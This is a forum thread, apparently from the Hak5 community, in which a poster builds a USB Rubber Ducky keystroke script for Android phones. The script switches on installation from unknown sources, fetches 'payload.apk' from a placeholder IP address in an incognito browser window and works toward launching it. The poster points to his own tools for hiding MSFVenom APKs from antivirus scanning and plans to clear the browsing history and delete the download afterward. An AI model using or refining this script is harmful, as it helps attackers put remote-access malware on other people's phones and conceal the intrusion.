Android Payload Help

[n33dsh3llz]

Hello Hak5 Community,

Trying to figure out how to download a .apk file, then execute it. I know how to download it, which may be enough. Ideally, the whole process could be 100% automated. Maybe I could just sleep the script giving the user time to launch manually if there is no hotkeys. I tried opening the downloads inside the browser, but couldn't find a way to select the rows of downloaded files (maybe a security feature). Also, when bringing down the main bar and going to the downloaded file, then launching, it never opened the app other than seeing the AV scan take place.

Note: WINDOWS+N brings down top slider bar & F10 opens downloads in Chrome.. documents said CNTL+J opened downloads, but it wasn't working for me. 

Can't figure out a way to open the downloaded .apk file.

 

 

Here is what I have so far. Keep in mind delays have not been put in yet and this is merely a run-down through using a keyboard:

#Allow unknown sources
ESCAPE #(x whatever for main screen)
WINDOWS+N
UP
ENTER
DOWN ARROW x 6
ENTER
DOWN ARROW x 7
ENTER
RIGHT ARROW
ENTER
ESCAPE #(x whatever to get to main screen)

#Begin the download and install of the payload
WINDOWS+B #Brings up the browser
CNTL+SHIFT+N #Open incognito window (if not chrome, shouldnt do anything)
CNTL+L #Access the URL bar
String http://x.x.x.x:xxxx/payload.apk #types in the file to download
ENTER

** FIGURE OUT WAY TO LAUNCH IT **

TAB
TAB #Places you at INSTALL
ENTER
SLEEP X #Give to install
TAB
TAB 
ENTER #Launch

 

 

Recent scripts I wrote to bypass Android AV:

https://github.com/jbreed/apkwash

https://github.com/jbreed/apkinjector

For this attack, apkwash would be perfect as it would simply mask the small .apk file generated by MSFVenom. Smaller=faster downloading. Maybe a twin-duck for this would work better to install from local media.

 

[n33dsh3llz]

Ended up finishing the unknown sources setting, but figured it is a waste of time as it can be easily bypassed once attempting to install.

https://github.com/jbreed/usb-ducky-android-download

Here is what I think will work best as there is so many issues that can arise.

Potential issues:

-Default browser not set to chrome. ALT d is to get the URL line for "Internet" app. May add this just to make it fail-safe.

-Default browser not set at all. This will simply require pressing the button to relaunch the script as it should have been set with the first run.

 

What would take place after:

Install the apk (bypass untrusted sources, select 'open')

Clear browsing history if default app wasn't chrome

Delete the downloaded .apk file (if launched with Chrome, then the script below will take you to the screen afterwards)

DELAY 200
REM ----- BACK OUT TO MAIN MENU -----
ESCAPE
ESCAPE
REM ----- OPEN BROWSER ------
GUI b
DELAY 1000
REM ----- Select url bar and navigate -----
CTRL l
ALT d
DELAY 200
STRING example.com
DELAY 250
ENTER
DELAY 250
REM ----- DOWNLOAD HAS BEGAN -----
REM ----- TIME TO INSTALL MANUALLY -----
REM ----- FOR CHROME, CLEARING HISTORY AND OPENING DOWNLOADS -----
CTRL h
DELAY 300
TAB
TAB
TAB
DELAY 10
ENTER
DELAY 100
F10
DELAY 300
DOWN
DOWN
DOWN
DOWN
DOWN
DOWN
ENTER

 

Edited February 25, 2017 by n33dsh3llz
updated